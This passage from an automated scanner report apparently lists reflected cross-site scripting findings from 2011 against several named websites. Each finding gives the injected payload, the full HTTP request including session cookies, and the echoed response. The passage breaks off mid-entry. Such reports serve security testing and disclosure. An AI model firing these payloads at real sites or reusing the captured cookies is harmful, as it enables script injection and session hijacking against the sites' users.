The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad216"><img%20src%3da%20onerror%3dalert(1)>a10ddffaa58 was submitted in the REST URL parameter 1. This input was echoed as ad216"><img src=a onerror=alert(1)>a10ddffaa58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesad216"><img%20src%3da%20onerror%3dalert(1)>a10ddffaa58/default/files/blogger/Michael_0.jpg?1262947422 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesad216"><img src=a onerror=alert(1)>a10ddffaa58-default-files-blogger-Michael-0.jpg not-front not-logged-in page-sitesad216img-srca-onerroralert1a10ddffaa58 no-sidebars">
...[SNIP]...

3.157. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Michael_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f18ea"><img%20src%3da%20onerror%3dalert(1)>393e7302d5f was submitted in the REST URL parameter 2. This input was echoed as f18ea"><img src=a onerror=alert(1)>393e7302d5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/defaultf18ea"><img%20src%3da%20onerror%3dalert(1)>393e7302d5f/files/blogger/Michael_0.jpg?1262947422 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-defaultf18ea"><img src=a onerror=alert(1)>393e7302d5f-files-blogger-Michael-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.158. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Michael_0.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef90"><img%20src%3da%20onerror%3dalert(1)>15718a32de0 was submitted in the REST URL parameter 3. This input was echoed as 9ef90"><img src=a onerror=alert(1)>15718a32de0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/files9ef90"><img%20src%3da%20onerror%3dalert(1)>15718a32de0/blogger/Michael_0.jpg?1262947422 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:46:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:46:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-files9ef90"><img src=a onerror=alert(1)>15718a32de0-blogger-Michael-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.159. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Michael_0.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0192"><img%20src%3da%20onerror%3dalert(1)>5cdb37c2fc7 was submitted in the REST URL parameter 4. This input was echoed as e0192"><img src=a onerror=alert(1)>5cdb37c2fc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/files/bloggere0192"><img%20src%3da%20onerror%3dalert(1)>5cdb37c2fc7/Michael_0.jpg?1262947422 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:47:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:47:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-files-bloggere0192"><img src=a onerror=alert(1)>5cdb37c2fc7-Michael-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.160. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Michael_0.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 279d9"><img%20src%3da%20onerror%3dalert(1)>8079457cfc0 was submitted in the REST URL parameter 5. This input was echoed as 279d9"><img src=a onerror=alert(1)>8079457cfc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/files/blogger/Michael_0.jpg279d9"><img%20src%3da%20onerror%3dalert(1)>8079457cfc0?1262947422 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:48:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:48:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-files-blogger-Michael-0.jpg279d9"><img src=a onerror=alert(1)>8079457cfc0 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.161. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Wendy_0.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d31"><img%20src%3da%20onerror%3dalert(1)>5fcd56ff315 was submitted in the REST URL parameter 1. This input was echoed as a1d31"><img src=a onerror=alert(1)>5fcd56ff315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesa1d31"><img%20src%3da%20onerror%3dalert(1)>5fcd56ff315/default/files/blogger/Wendy_0.jpg?1262947372 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesa1d31"><img src=a onerror=alert(1)>5fcd56ff315-default-files-blogger-Wendy-0.jpg not-front not-logged-in page-sitesa1d31img-srca-onerroralert15fcd56ff315 no-sidebars">
...[SNIP]...

3.162. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Wendy_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5595f"><img%20src%3da%20onerror%3dalert(1)>ef72e250029 was submitted in the REST URL parameter 2. This input was echoed as 5595f"><img src=a onerror=alert(1)>ef72e250029 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default5595f"><img%20src%3da%20onerror%3dalert(1)>ef72e250029/files/blogger/Wendy_0.jpg?1262947372 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:43:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:43:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default5595f"><img src=a onerror=alert(1)>ef72e250029-files-blogger-Wendy-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.163. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Wendy_0.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca239"><img%20src%3da%20onerror%3dalert(1)>355951df0a5 was submitted in the REST URL parameter 3. This input was echoed as ca239"><img src=a onerror=alert(1)>355951df0a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/filesca239"><img%20src%3da%20onerror%3dalert(1)>355951df0a5/blogger/Wendy_0.jpg?1262947372 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-filesca239"><img src=a onerror=alert(1)>355951df0a5-blogger-Wendy-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.164. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Wendy_0.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13886"><img%20src%3da%20onerror%3dalert(1)>61979da1bf0 was submitted in the REST URL parameter 4. This input was echoed as 13886"><img src=a onerror=alert(1)>61979da1bf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/files/blogger13886"><img%20src%3da%20onerror%3dalert(1)>61979da1bf0/Wendy_0.jpg?1262947372 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-files-blogger13886"><img src=a onerror=alert(1)>61979da1bf0-Wendy-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.165. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Wendy_0.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e68b"><img%20src%3da%20onerror%3dalert(1)>5d1d857a6ab was submitted in the REST URL parameter 5. This input was echoed as 2e68b"><img src=a onerror=alert(1)>5d1d857a6ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/files/blogger/Wendy_0.jpg2e68b"><img%20src%3da%20onerror%3dalert(1)>5d1d857a6ab?1262947372 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:47:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:47:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-files-blogger-Wendy-0.jpg2e68b"><img src=a onerror=alert(1)>5d1d857a6ab not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.166. http://jobs.ctg.eu/we-promise [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /we-promise

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4549d"><img%20src%3da%20onerror%3dalert(1)>a96526d001d was submitted in the REST URL parameter 1. This input was echoed as 4549d"><img src=a onerror=alert(1)>a96526d001d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /we-promise4549d"><img%20src%3da%20onerror%3dalert(1)>a96526d001d HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; has_js=1; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:21:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:21:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="we-promise4549d"><img src=a onerror=alert(1)>a96526d001d not-front not-logged-in page-we-promise4549dimg-srca-onerroralert1a96526d001d no-sidebars">
...[SNIP]...

3.167. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e0625<script>alert(1)</script>bfb396fceb was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=E05511e0625<script>alert(1)</script>bfb396fceb HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: js.revsci.net
Cookie: NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; rtc_OpU7=MLuBc48HAV1DFVRCdcKR9w1Atq8QzHTJMWpRG3eQ; udm_0=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; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6m1VdDt3E/tUdVA6Ab/nTZMFQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 22 Apr 2011 15:28:33 GMT
Cache-Control: max-age=86400, private
Expires: Sat, 23 Apr 2011 15:28:33 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 15:28:33 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "E05511E0625<SCRIPT>ALERT(1)</SCRIPT>BFB396FCEB" was not recognized.
*/

3.168. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://salsacommons.org
Path:   /o/8001/p/salsa/commons/img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66456"-alert(1)-"9f81cfc7a30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

